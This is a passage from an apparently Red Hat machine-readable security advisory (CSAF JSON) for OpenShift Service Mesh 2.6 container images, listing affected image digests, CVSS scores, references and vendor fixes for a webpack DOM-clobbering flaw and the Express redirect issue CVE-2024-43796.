"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
